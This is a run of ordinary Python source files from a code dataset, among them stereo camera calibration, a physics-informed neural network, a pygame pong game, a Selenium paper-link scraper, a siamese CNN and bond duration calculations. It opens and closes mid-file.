cv2.waitKey(50)\n\n cv2.destroyAllWindows()\n\n\ndef main():\n if status == \"shoot\":\n frameId = 1\n while True:\n cam_EYE = 'L'\n cam_ON = camera.Open(\"PI\", cam_EYE)\n cam_ON = camera.Setup(cam_ON, cam_setting, \"PI\")\n # capture image\n # time.sleep(0.1)\n img_L = camera.Capture(cam_ON, \"PI\")\n # img_L = cv2.flip(img_L, -1)\n cam_ON.close()\n\n cam_EYE = 'R'\n cam_ON = camera.Open(\"PI\", cam_EYE)\n cam_ON = camera.Setup(cam_ON, cam_setting, \"PI\")\n # capture image\n # time.sleep(0.1)\n img_R = camera.Capture(cam_ON, \"PI\")\n # img_R = cv2.flip(img_R, -1)\n cam_ON.close()\n\n gray_L = cv2.cvtColor(img_L, cv2.COLOR_BGR2GRAY)\n gray_R = cv2.cvtColor(img_R, cv2.COLOR_BGR2GRAY)\n\n height, width = gray_L.shape[:2]\n gray_L_s = cv2.resize(gray_L,(int(0.5 * width),int(0.5 * height)),interpolation=cv2.INTER_CUBIC)\n gray_R_s = cv2.resize(gray_R, (int(0.5 * width),int(0.5 * height)), interpolation=cv2.INTER_CUBIC)\n cv2.imshow('L_cam', gray_L_s)\n cv2.imshow('R_cam', gray_R_s)\n cv2.moveWindow(\"L_cam\", 100, 400)\n cv2.moveWindow(\"R_cam\",800,400)\n key = cv2.waitKey(50)\n if key == 27:\n break\n elif key == 13:\n # press enter\n L_save = L_path + '/{:04d}.jpg'\n R_save = R_path + '/{:04d}.jpg'\n cv2.imwrite(L_save.format(frameId), gray_L)\n cv2.imwrite(R_save.format(frameId), gray_R)\n print(\"Image pair {0} saved.\".format(frameId))\n frameId += 1\n\n elif status == \"calibrate\":\n # refer: https://albertarmea.com/post/opencv-stereo-camera/\n\n TERMINATION_CRITERIA = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n OPTIMIZE_ALPHA = 0\n\n outputFile = '/home/pi/Desktop/PyCharm/Cam_coefficients.npz'\n leftCamCali = '/home/pi/Desktop/PyCharm/L_Cam_Matrix.npz'\n rightCamCali = '/home/pi/Desktop/PyCharm/R_Cam_Matrix.npz'\n\n (leftFilenames, leftObjectPoints, leftImagePoints, 
leftSize) = Find_chessboard_single(L_path)\n (rightFilenames, rightObjectPoints, rightImagePoints, rightSize ) = Find_chessboard_single(R_path)\n\n if leftSize != rightSize:\n print(\"Camera resolutions do not match\")\n sys.exit(1)\n imageSize = leftSize\n\n print(\"Choose {0} images to do calibration\".format(MAX_IMAGES))\n filenames = list(set(leftFilenames) & set(rightFilenames))\n if (len(filenames) > MAX_IMAGES):\n print(\"Too many images to calibrate, using {0} randomly selected images\"\n .format(MAX_IMAGES))\n filenames = random.sample(filenames, MAX_IMAGES)\n filenames = sorted(filenames)\n print(\"Using these images:\")\n print(filenames)\n\n leftObjectPoints, leftImagePoints = Get_require_points(filenames,\n leftFilenames, leftObjectPoints, leftImagePoints)\n rightObjectPoints, rightImagePoints = Get_require_points(filenames,\n rightFilenames, rightObjectPoints, rightImagePoints)\n\n # objectPoints = leftObjectPoints\n objectPoints = rightObjectPoints\n\n try:\n cache_L = np.load(leftCamCali)\n print(\"Loading left calibration data from cache file at {0}\".format(leftCamCali))\n cache_R = np.load(rightCamCali)\n print(\"Loading left calibration data from cache file at {0}\".format(rightCamCali))\n\n leftCameraMatrix = cache_L[\"leftCameraMatrix\"]\n leftDistortionCoefficients = cache_L[\"leftDistortionCoefficients\"]\n rightCameraMatrix = cache_R[\"rightCameraMatrix\"]\n rightDistortionCoefficients = cache_R[\"rightDistortionCoefficients\"]\n except IOError:\n print(\"Cache file at {0} not found\".format(leftCamCali))\n print(\"Cache file at {0} not found\".format(rightCamCali))\n\n print(\"Calibrating left camera...\")\n _, leftCameraMatrix, leftDistortionCoefficients, _, _ = cv2.calibrateCamera(\n objectPoints, leftImagePoints, imageSize, None, None)\n print(\"Caching left camera matrix... \")\n np.savez_compressed(leftCamCali, leftCameraMatrix=leftCameraMatrix,\n leftDistortionCoefficients=leftDistortionCoefficients)\n\n print(\"Calibrating right camera...\")\n _, rightCameraMatrix, rightDistortionCoefficients, _, _ = cv2.calibrateCamera(\n objectPoints, rightImagePoints, imageSize, None, None)\n print(\"Caching right camera matrix... \")\n np.savez_compressed(rightCamCali, rightCameraMatrix=rightCameraMatrix,\n rightDistortionCoefficients=rightDistortionCoefficients)\n\n\n # print(\"Calibration test... 
\")\n # Test_calibration(leftCameraMatrix, leftDistortionCoefficients, L_path)\n # Test_calibration(rightCameraMatrix, rightDistortionCoefficients, R_path)\n\n print(\"Calibrating cameras together...\")\n (_, _, _, _, _, rotationMatrix, translationVector, _, _) = cv2.stereoCalibrate(\n objectPoints, leftImagePoints, rightImagePoints,\n leftCameraMatrix, leftDistortionCoefficients,\n rightCameraMatrix, rightDistortionCoefficients,\n imageSize, None, None, None, None,\n cv2.CALIB_FIX_INTRINSIC, TERMINATION_CRITERIA)\n\n print(\"Rectifying cameras...\")\n (leftRectification, rightRectification, leftProjection, rightProjection,\n dispartityToDepthMap, leftROI, rightROI) = cv2.stereoRectify(\n leftCameraMatrix, leftDistortionCoefficients,\n rightCameraMatrix, rightDistortionCoefficients,\n imageSize, rotationMatrix, translationVector,\n None, None, None, None, None,\n cv2.CALIB_ZERO_DISPARITY, OPTIMIZE_ALPHA)\n\n print(\"Saving calibration...\")\n leftMapX, leftMapY = cv2.initUndistortRectifyMap(\n leftCameraMatrix, leftDistortionCoefficients, leftRectification,\n leftProjection, imageSize, cv2.CV_32FC1)\n rightMapX, rightMapY = cv2.initUndistortRectifyMap(\n rightCameraMatrix, rightDistortionCoefficients, rightRectification,\n rightProjection, imageSize, cv2.CV_32FC1)\n\n np.savez_compressed(outputFile, imageSize=imageSize,\n leftMapX=leftMapX, leftMapY=leftMapY, leftROI=leftROI,\n rightMapX=rightMapX, rightMapY=rightMapY, rightROI=rightROI,\n dispartityToDepthMap=dispartityToDepthMap)\n\n cv2.destroyAllWindows()\n\nmain()","repo_name":"karex27/collision_avoidance","sub_path":"calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":10904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"24523610627","text":"import tensorflow as tf\nimport keras\n\n\nclass PhysicsInformedNN(keras.Model):\n def __init__(self, Re, Sc, hidden_units, x_test, loss_fn, data_loss_w=100, training_metrics=[],\n evaluation_metrics=[]):\n super(PhysicsInformedNN, self).__init__()\n ##Reynold number and Schmidt number\n self.data_loss_w = data_loss_w\n self.loss_fn = loss_fn\n self.Re = Re\n self.Sc = Sc\n self.ReSc = self.Re * self.Sc\n self.training_metrics = training_metrics\n self.evaluation_metrics = evaluation_metrics\n self.list_layers = [tf.keras.layers.Dense(hidden_units[0], activation='swish', input_shape=[x_test.shape[1]])] + \\\n [tf.keras.layers.Dense(hidden_unit,activation='swish') for hidden_unit in hidden_units] + \\\n [tf.keras.layers.Dense(4)]\n self.model_eqns = tf.keras.Sequential(self.list_layers)\n test = self.model_eqns(x_test)\n\n def __call__(self, inputs,training=True):\n pred = self.model_eqns(inputs, training=training)\n rho, u, v, p = [tf.reshape(pred[:, i], (-1, 1)) for i in range(4)]\n return rho, u, v, p\n\n def train_step(self, data):\n x_train, y_train = data\n\n # unpack x_train in x,y,t\n x, y, t = [tf.reshape(x_train[:, i], (-1, 1)) for i in range(3)]\n # data obs for rho and data obs for the equations\n rho_train, y_eqns = [tf.reshape(y_train[:, i], (-1, 1)) for i in range(2)]\n\n with tf.GradientTape() as tape:\n with tf.GradientTape(persistent=True) as t2:\n t2.watch(x)\n t2.watch(y)\n t2.watch(t)\n with tf.GradientTape(persistent=True) as t1:\n t1.watch(x)\n t1.watch(y)\n t1.watch(t)\n X = tf.stack([x[:, 0], y[:, 0], t[:, 0]], axis=1)\n rho, u, v, p = self(X)\n\n ##rho 1st derivatives\n rho_x, rho_y, rho_t = [t1.gradient(rho, var) for var in [x, y, t]]\n ##u 1st derivatives\n u_x, u_y, u_t = 
[t1.gradient(u, var) for var in [x, y, t]]\n ##v 1st derivatives\n v_x, v_y, v_t = [t1.gradient(v, var) for var in [x, y, t]]\n ##p 1st derivatives\n p_x, p_y = [t1.gradient(p, var) for var in [x, y]]\n ##second derivatoves\n rho_xx, rho_yy, u_xx, u_yy, v_xx, v_yy = [t2.gradient(*ij) for ij in\n zip([rho_x, rho_y, u_x, u_y, v_x, v_y], [x, y] * 3)]\n\n e1 = (u_t + u * u_x + v * u_y) + p_x - (1 / self.Re) * (u_xx + u_yy)\n e2 = (v_t + u * v_x + v * v_y) + p_y - (1 / self.Re) * (v_xx + v_yy) + rho\n e3 = u_x + v_y\n e4 = rho_t + u * rho_x + v * rho_y - (1 / self.ReSc) * (rho_xx + rho_yy)\n\n square_eqns = [tf.square(e_i) for e_i in [e1, e2, e3, e4]]\n\n square_data = tf.square(rho - rho_train)\n\n for e_i, metric in zip([square_data, e1, e2, e3, e4], self.training_metrics):\n metric.update_state(e_i, y_eqns)\n\n loss_eqns = self.loss_fn(tf.reduce_sum(square_eqns), y_eqns)\n loss_obs = self.loss_fn(square_data, y_eqns)\n loss = self.data_loss_w * loss_obs + loss_eqns\n\n gradients = tape.gradient(loss, self.trainable_variables)\n self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))\n metrics = self.training_metrics\n return {m.name: m.result() for m in metrics}\n\n def test_step(self, data):\n x, y = data\n\n rho_valid, u_valid, v_valid = [tf.reshape(y[:, i], (-1, 1)) for i in range(3)]\n\n # Compute predictions\n rho_pred, u_pred, v_pred, p_pred = self(x, training=False)\n\n for metric, valid, pred in zip(self.evaluation_metrics, [rho_valid, u_valid, v_valid],\n [rho_pred, u_pred, v_pred]):\n metric.update_state(valid, pred)\n\n # Updates the metrics tracking the loss\n\n metrics = self.evaluation_metrics\n\n return {m.name: m.result() for m in metrics}\n","repo_name":"Micka-ui/PINN_2DGC","sub_path":"PhysicsInformedNN.py","file_name":"PhysicsInformedNN.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"43447241395","text":"import numpy as np\nimport torch.nn as nn\nfrom torch import Tensor\nfrom torch.distributions.beta import Beta\nfrom torch.optim import Adam\n\nfrom agentRL import BetaAgent\nfrom nation import Nation\nfrom replayBuffer import replayBuffer\n\n\nclass NationRL(BetaAgent, Nation):\n\n def __init__(\n self,\n config_par,\n contact_matrix,\n cont_param,\n population,\n C,\n name,\n state,\n parameters,\n ):\n\n BetaAgent.__init__(self, config_par=config_par, name=name)\n\n Nation.__init__(\n self,\n config_par,\n contact_matrix,\n cont_param,\n population,\n C,\n name,\n state,\n parameters,\n )\n\n # Give experience to agent\n\n def extract_state(self, state_info):\n return state_info.SEAIRDV.flatten().astype(float)\n\n def policy(self):\n return BetaAgent.policy(self)[0]\n","repo_name":"FrancescaPerin/Covid-first-trial","sub_path":"src/code/nationRL.py","file_name":"nationRL.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"21324286025","text":"import random\n\nimport pygame\n\npygame.init()\nWIDTH = 500\nHEIGHT = 500\nBACKGROUND_COLOUR = (41, 36, 33)\nINTERFACE_COLOUR = (41, 36, 33)\nBUTTON_COLOUR = (100, 100, 100)\nBUTTON_TEXT_COLOUR = (255, 235, 205)\nWHITE = (255, 255, 255)\n#create a game window with a specific width and height\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n#create a name for the window\npygame.display.set_caption(\"plan pingpong\")\n#define clock\nclock = pygame.time.Clock()\n\nRACKET_IMG = 
pygame.image.load(\"racket.png\")\nBALL_IMG = pygame.image.load(\"ball.png\")\n\nclass Button:\n\n def __init__(self, position, text, colour, size = (200, 50)):\n #draw the rectangle as the button\n rect_x, rect_y = position\n rectangle = pygame.Rect(position, size)\n self.rect = rectangle\n pygame.draw.rect(screen, colour, rectangle)\n #draw text on the button\n font = pygame.font.Font(None, 70)\n content = font.render(text, True, BUTTON_TEXT_COLOUR)\n screen.blit(content, position)\n\n def click(self, position):\n return self.rect.collidepoint(position)\n\n\ndef startInterface():\n clock = pygame.time.Clock()\n while True:\n screen.fill(INTERFACE_COLOUR)\n button_1 = Button((150, 175), '1 Player', BUTTON_COLOUR)\n button_2 = Button((150, 275), '2 Player', BUTTON_COLOUR)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if button_1.click(pygame.mouse.get_pos()):\n return 1\n elif button_2.click(pygame.mouse.get_pos()):\n return 2\n clock.tick(10)\n pygame.display.update()\n\ndef endInterface(left_score, right_score):\n font1 = pygame.font.Font(None, 50)\n font2 = pygame.font.Font(None, 30)\n text1 = 'Player on left won!' if left_score > right_score else 'Player on right won!'\n text2 = 'Press ESCAPE to quit.'\n text3 = 'Press ENTER to continue or play again.'\n\n text1 = font1.render(text1, True, WHITE)\n text2 = font2.render(text2, True, WHITE)\n text3 = font2.render(text3, True, WHITE)\n\n rect1 = text1.get_rect()\n rect2 = text2.get_rect()\n rect3 = text3.get_rect()\n rect1.center = ((WIDTH//2, HEIGHT//2-100))\n rect2.center = ((WIDTH//2, HEIGHT//2+50))\n rect3.center = ((WIDTH//2, HEIGHT//2+100))\n while True:\n screen.fill(BACKGROUND_COLOUR)\n screen.blit(text1, rect1)\n screen.blit(text2, rect2)\n screen.blit(text3, rect3)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n return\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n return\n elif event.key == pygame.K_ESCAPE:\n pygame.quit()\n\n\n pygame.display.update()\n\nclass Racket(pygame.sprite.Sprite):\n def __init__(self, image, type, speed):\n super().__init__()\n self.image = RACKET_IMG\n self.type = type\n self.rect = self.image.get_rect()\n self.speed = speed\n\n def move(self, direction):\n if direction == \"UP\":\n self.rect.top = self.rect.top - self.speed\n self.rect.top = max(self.rect.top, 0)\n if direction== \"DOWN\":\n self.rect.bottom = self.rect.bottom + self.speed\n self.rect.bottom = min(self.rect.bottom, HEIGHT)\n\n def automove(self, ball):\n if ball.rect.centery > self.rect.centery:\n self.move(\"DOWN\")\n if ball.rect.centery < self.rect.centery:\n self.move(\"UP\")\n\n\n def reset(self):\n if self.type == \"RIGHT\":\n self.rect.right = WIDTH\n else:\n self.rect.left = 0\n self.rect.centery = HEIGHT//2\n\n def draw(self):\n screen.blit(self.image, self.rect)\n\nclass Ball(pygame.sprite.Sprite):\n def __init__(self, image, speed):\n super().__init__()\n self.image = image\n self.rect = image.get_rect()\n self.speed = speed\n\n def move(self, right_racket, left_racket, left_score, right_score):\n self.rect.centerx = self.rect.centerx + self.speed * self.directrion_x\n self.rect.centery = self.rect.centery + self.speed * self.directrion_y\n\n if pygame.sprite.collide_rect(self, right_racket) or pygame.sprite.collide_rect(self, left_racket):\n self.directrion_x = -self.directrion_x\n self.directrion_y = random.choice([1, -1])\n self.speed +=1\n elif self.rect.top < 0:\n 
self.directrion_y = 1\n\n elif self.rect.bottom > HEIGHT:\n self.directrion_y = -1\n\n elif self.rect.left < 0:\n self.reset()\n left_racket.reset()\n right_racket.reset()\n right_score +=1\n\n elif self.rect.right > WIDTH:\n self.reset()\n left_racket.reset()\n right_racket.reset()\n left_score +=1\n return left_score, right_score\n def reset(self):\n self.rect.centerx = WIDTH//2\n self.rect.centery = random.randrange(self.rect.height//2, HEIGHT - self.rect.height//2)\n self.directrion_x = random.choice([-1, 1])\n self.directrion_y = random.choice([-1, 1])\n self.speed = 1\n\n def draw(self):\n screen.blit(self.image, self.rect)\n\n\n\nfont = pygame.font.Font(None, 50)\nrunning = True\ngame_mode = startInterface()\nright_racket = Racket(RACKET_IMG, \"RIGHT\", 5)\nright_racket.reset()\nleft_racket = Racket(RACKET_IMG, \"LEFT\", 5)\nleft_racket.reset()\nball = Ball(BALL_IMG, 1)\nball.reset()\nleft_score = 0\nright_score = 0\nwhile running:\n clock.tick(60)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n screen.fill(BACKGROUND_COLOUR)\n\n pressed_keys = pygame.key.get_pressed()\n if pressed_keys[pygame.K_UP]:\n right_racket.move('UP')\n elif pressed_keys[pygame.K_DOWN]:\n right_racket.move('DOWN')\n if game_mode == 2:\n if pressed_keys[pygame.K_w]:\n left_racket.move('UP')\n elif pressed_keys[pygame.K_s]:\n left_racket.move('DOWN')\n else:\n left_racket.automove(ball)\n\n pygame.draw.rect(screen, WHITE, (247, 0, 6, 500))\n right_racket.draw()\n left_racket.draw()\n left_score, right_score = ball.move(right_racket, left_racket, left_score, right_score)\n ball.draw()\n\n screen.blit(font.render(str(left_score), False, WHITE), (150, 10))\n screen.blit(font.render(str(right_score), False, WHITE), (300, 10))\n if left_score == 11 or right_score == 11:\n break\n pygame.display.update()\n\nendInterface(left_score, right_score)\npygame.quit()\n\n","repo_name":"JunhongC-coder/pygame-collection","sub_path":"pingpong/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":6744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"3414048080","text":"\"\"\"\nInside kaggle_titanic_deploy folder, run: python src/train_model.py\n\"\"\"\nimport pandas as pd\nimport pickle\nfrom sklearn.linear_model import LogisticRegression\nfrom feature_engineering_pipeline import FeatureEngineering\n\n\ndef main():\n train = pd.read_csv('data/train.csv')\n X_train = train.drop(['Survived'], axis=1)\n y_train = train['Survived']\n\n X_test = pd.read_csv('data/test.csv')\n\n features = ['Pclass', 'Age', 'Sex', 'Fare']\n X_train = X_train[features]\n X_test = X_test[features]\n\n feature_engineering_pipeline = FeatureEngineering().get_pipeline()\n X_train = feature_engineering_pipeline.fit_transform(X_train)\n\n X_test = feature_engineering_pipeline.transform(X_test)\n\n X_train.to_csv('data/train_after_feature_engineering.csv', index=False)\n X_test.to_csv('data/test_after_feature_engineering.csv', index=False)\n\n model = LogisticRegression()\n\n model.fit(X_train, y_train)\n\n with open('models/model.pkl', 'wb') as pickle_file:\n pickle.dump(model, pickle_file)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"vivianyamassaki/kaggle_titanic_deploy","sub_path":"src/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"86"} +{"seq_id":"70925466204","text":"import argparse\nimport 
json\nimport sys\nfrom selenium import webdriver\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\n\ndef find_github_link(article_title):\n    info_dict = {}\n    info_dict['Article_title'] = article_title\n    chrome_options = Options()\n    chrome_options.add_argument('--headless=new')\n    driver = webdriver.Chrome(options=chrome_options)\n    # driver = webdriver.Chrome()\n    \n    driver.get(\"https://paperswithcode.com/\")\n    search_box = driver.find_element(\"name\", \"q\")\n    search_box.send_keys(f\"{article_title}\")\n    search_box.submit()\n    current_url = driver.current_url\n    driver.get(current_url)\n    sub_tags = driver.find_element(By.XPATH, \"/html/body/div[3]/div[2]\").find_elements(By.XPATH, \"./*\")\n    if len(sub_tags) > 0:\n        info_dict['status'] = \"OK\"\n        code_url = sub_tags[0].find_element(By.XPATH, \"/html/body/div[3]/div[2]/div[1]/div[2]/div/div[2]/div[2]/a[2]\").get_attribute(\"href\")\n        driver.get(code_url)\n        list_code_link = driver.find_element(\"id\", \"implementations-short-list\").find_elements(By.XPATH, \"./*\")\n        if len(list_code_link) > 0:\n            lst_github = []\n            top_code_link = list_code_link if len(list_code_link) < 5 else list_code_link[:5]\n            for code_link in top_code_link:\n                github_url = code_link.find_element(By.CLASS_NAME, \"code-table-link\").get_attribute(\"href\")\n                lst_github.append(github_url)\n            info_dict['Github'] = lst_github\n        else:\n            info_dict['Github'] = \"No code\"\n    else:\n        info_dict['status'] = \"Paper not found\"\n    driver.quit()\n    return info_dict\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--name\", help=\"Paper title\", required=True)\n    args = parser.parse_args()\n    \n    article_name = args.name\n    github_link = find_github_link(article_name)\n\n    if github_link['status'] == 'OK':\n        print(f\"Found paper: \\n{json.dumps(github_link, indent = 4)}\")\n    else:\n        print(f\"{json.dumps(github_link, indent = 4)}\")\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"pdthuc/Github-Crawler","sub_path":"find_github.py","file_name":"find_github.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"10105848104","text":"\"\"\"\nWrite a program that asks the user for the current time and, based on the\nhour given, prints the appropriate greeting. E.g.\nGood morning 0-11, Good afternoon 12-17 and Good night 18-23.\n\"\"\"\n\nhora = input(\"Enter the current hour (24-hour format): \")\n\ntry:\n    hora = int(hora)\n    if hora >= 0 and hora <= 11:\n        print(\"Good morning!\")\n    elif hora >= 12 and hora <= 17:\n        print(\"Good afternoon!\")\n    elif hora >= 18 and hora <= 23:\n        print(\"Good night!\")\n    else:\n        print(\"Invalid hour. Enter a value between 0 and 23.\")\nexcept ValueError:\n    print(\"Invalid value. Enter an integer between 0 and 23.\")
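# Worked examples (hypothetical runs): hora=9 -> \"Good morning!\", hora=14 ->\n# \"Good afternoon!\", hora=20 -> \"Good night!\", hora=30 -> the out-of-range message.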
\n","repo_name":"aleyssongarcia/Python-aulas","sub_path":"Aula_27.py","file_name":"Aula_27.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"}
+{"seq_id":"15218997465","text":"import mysql.connector\n\ndb = mysql.connector.connect(\n    host=\"127.0.0.1\",\n    user=\"root\",\n    password=\"F3bru@ry!234\",\n    database=\"Assessment\"\n)\ncursor = db.cursor()\n\n\nprint(\"\\n\")\nprint(\"Current Database\")\ncursor.execute(\"SHOW DATABASES LIKE 'A%';\")\n\n\nfor Database in cursor:\n    print(Database)\n\nprint(\"\\n\")\nprint(\"Current Tables\")\n\ncursor.execute(\"SHOW TABLES;\")\n\nfor Tables in cursor:\n    print(Tables)\n\n\ncursor.execute(\"DROP TABLE IF EXISTS BOM_BKP\")\ncursor.execute(\"CREATE TABLE BOM_BKP SELECT * FROM BOM\")\n\n\nprint(\"\\n\")\nprint(\"Current Database\")\ncursor.execute(\"SHOW DATABASES LIKE 'A%';\")\n\n\nfor Database in cursor:\n    print(Database)\n\nprint(\"\\n\")\nprint(\"Updated list of Tables\")\n\ncursor.execute(\"SHOW TABLES;\")\n\nfor Tables in cursor:\n    print(Tables)\n","repo_name":"reynaldo-roberto/Assessment","sub_path":"For Submission/Python Scripts/add_table_backup.py","file_name":"add_table_backup.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"1172019103","text":"from yt.testing import *\nfrom yt.utilities.answer_testing.framework import \\\n    requires_ds, \\\n    data_dir_load\nfrom yt.frontends.gadget.api import GadgetHDF5Dataset\n\nisothermal = \"IsothermalCollapse/snap_505.hdf5\"\n@requires_file(isothermal)\ndef test_GadgetDataset():\n    kwargs = dict(bounding_box=[[-3,3], [-3,3], [-3,3]])\n    assert isinstance(data_dir_load(isothermal, kwargs=kwargs),\n                      GadgetHDF5Dataset)\n","repo_name":"danielgrassinger/yt_new_frontend","sub_path":"yt/frontends/gadget/tests/test_outputs.py","file_name":"test_outputs.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"11229993718","text":"import torch\nimport torch.nn as nn\nfrom torch import Tensor\nfrom torch import optim\nimport torch.nn.functional as F\nfrom dprint import dprint\n\n\nclass CNN_Text(nn.Module):\n    def __init__(self, V, D):\n        super(CNN_Text, self).__init__()\n\n        Ci = 1\n        Co = 100\n        Ks = [3, 4, 5]\n        C = 50\n\n        self.convs1 = nn.ModuleList([nn.Conv2d(Ci, Co, (K, D)) for K in Ks])\n        self.dropout = nn.Dropout(0.5)\n        self.fc1 = nn.Linear(len(Ks)*Co, 1)\n\n    def forward(self, x):\n        x = x.unsqueeze(1)  # (N, Ci, W, D)\n        # dprint('after unsqueeze(1) = {}'.format(x.size()), color='red')\n\n        # y = self.convs1[0](x)\n        # dprint('conv(x) = {}'.format(y.size()), color='red')\n\n        x = [F.relu(conv(x)).squeeze(3) for conv in self.convs1]  # [(N, Co, W), ...]*len(Ks)\n        # dprint('conv(x).squeeze(3) = {}'.format(x[0].size()), color='red')\n\n        x = [F.max_pool1d(i, i.size(2)).squeeze(2) for i in x]  # [(N, Co), ...]*len(Ks)\n        # dprint('max_pool1d(i, i.size(2)).squeeze(2) = {}'.format(x[0].size()), color='red')\n\n        x = torch.cat(x, 1)\n\n        dropout_x = self.dropout(x)  # (N, len(Ks)*Co)\n        \n        logit = self.fc1(dropout_x)  # (N, 1)\n\n        return logit\n\n\nclass Manhattan_CNN(nn.Module):\n    def __init__(self, data_name, hidden_size, embedding, use_embedding=False, train_embedding=True):\n        super(Manhattan_CNN, self).__init__()\n        self.data_name = data_name\n        self.use_cuda = torch.cuda.is_available()\n        self.hidden_size = hidden_size
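        # Note: each CNN_Text branch builds Conv2d kernels of shape (K, D) spanning\n        # the full width of a token vector, so hidden_size must equal the embedding\n        # dimension (input_size) for the convolutions to be shape-compatible.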
\n\n        if use_embedding:\n            self.embedding = nn.Embedding(embedding.shape[0], embedding.shape[1])\n            self.embedding.weight = nn.Parameter(embedding)\n            self.input_size = embedding.shape[1]  # V - Size of embedding vector\n\n        else:\n            self.embedding = nn.Embedding(embedding[0], embedding[1])\n            self.input_size = embedding[1]\n\n        self.embedding.weight.requires_grad = train_embedding\n\n        self.cnn_1 = CNN_Text(self.input_size, self.hidden_size)\n        self.cnn_2 = CNN_Text(self.input_size, self.hidden_size)\n\n    def exponent_neg_manhattan_distance(self, x1, x2):\n        ''' Helper function for the similarity estimate of the LSTMs outputs '''\n        return torch.exp(-torch.sum(torch.abs(x1 - x2), dim=1))\n\n    def forward(self, input):\n        '''\n        input -> (2 x Max. Sequence Length (per batch) x Batch Size)\n        '''\n        # dprint('input[0] = {}'.format(input[0].size()), color='red')\n        # dprint('input[1] = {}'.format(input[1].size()), color='red')\n\n        embedded_1 = self.embedding(input[0])  # L, B, V\n        embedded_2 = self.embedding(input[1])  # L, B, V\n        embedded_1 = embedded_1.permute(1, 0, 2)\n        embedded_2 = embedded_2.permute(1, 0, 2)\n\n        # dprint('embedded_1 = {}'.format(embedded_1.size()), color='red')\n        # dprint('embedded_2 = {}'.format(embedded_2.size()), color='red')\n\n        encoded_1 = self.cnn_1(embedded_1)\n        encoded_2 = self.cnn_2(embedded_2)\n\n        similarity_scores = self.exponent_neg_manhattan_distance(encoded_1, encoded_2)\n\n        if self.data_name == 'sick': return similarity_scores*5.0\n        else: return similarity_scores\n\n    def init_weights(self):\n        ''' Initialize weights of cnn 1 '''\n        for name_1, param_1 in self.cnn_1.named_parameters():\n            if 'bias' in name_1:\n                nn.init.constant_(param_1, 0.0)\n            elif 'weight' in name_1:\n                nn.init.xavier_normal_(param_1)\n\n        ''' Set weights of cnn 2 identical to cnn 1 '''\n        cnn_1 = self.cnn_1.state_dict()\n        cnn_2 = self.cnn_2.state_dict()\n\n        for name_1, param_1 in cnn_1.items():\n            # Backwards compatibility for serialized parameters.\n            if isinstance(param_1, torch.nn.Parameter):\n                param_1 = param_1.data\n\n            cnn_2[name_1].copy_(param_1)\n","repo_name":"hexists/study_sentence_embedding","sub_path":"manhattan_model/manhattan_cnn.py","file_name":"manhattan_cnn.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"5504404043","text":"import numpy_financial as npf\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# 30 year bond, coupon rate 3.5%, yield 5%\n\n# calculate duration\nprice = -npf.pv(0.05,30,3.5,100)\nprice_up = -npf.pv(0.06,30,3.5,100)\nprice_down = -npf.pv(0.04,30,3.5,100)\n\nduration = (price_down-price_up)/(2*price*0.01)\n\ndollar_duration = duration*price*0.01\n\ndv01 = duration*price*0.0001\n\n# calculate convexity\n\nconvexity = (price_down+price_up-(2*price))/(price*0.01**2)\n\n# high maturity, low coupon, low yield result in highest convexity\n\ndollar_convexity = convexity*price*(0.01**2)\n\nconvexity_adjustment = 0.5 * dollar_convexity * (100**2) * (0.01**2)\n\n# combine duration and convexity to predict bond price change; the convexity adjustment helps capture the curvature of the bond price/yield relationship\n\ncombined_prediction = -100*dollar_duration*0.01 + convexity_adjustment\n\n\n\n# determining bond convexity with various yields -> as yield increases, convexity decreases\n\nbond_yields = np.arange(0,20,0.1)\nbond = pd.DataFrame(bond_yields, columns=['bond_yield'])\nbond['price'] = -npf.pv((bond['bond_yield']/100),30,3.5,100) #actual bond price 
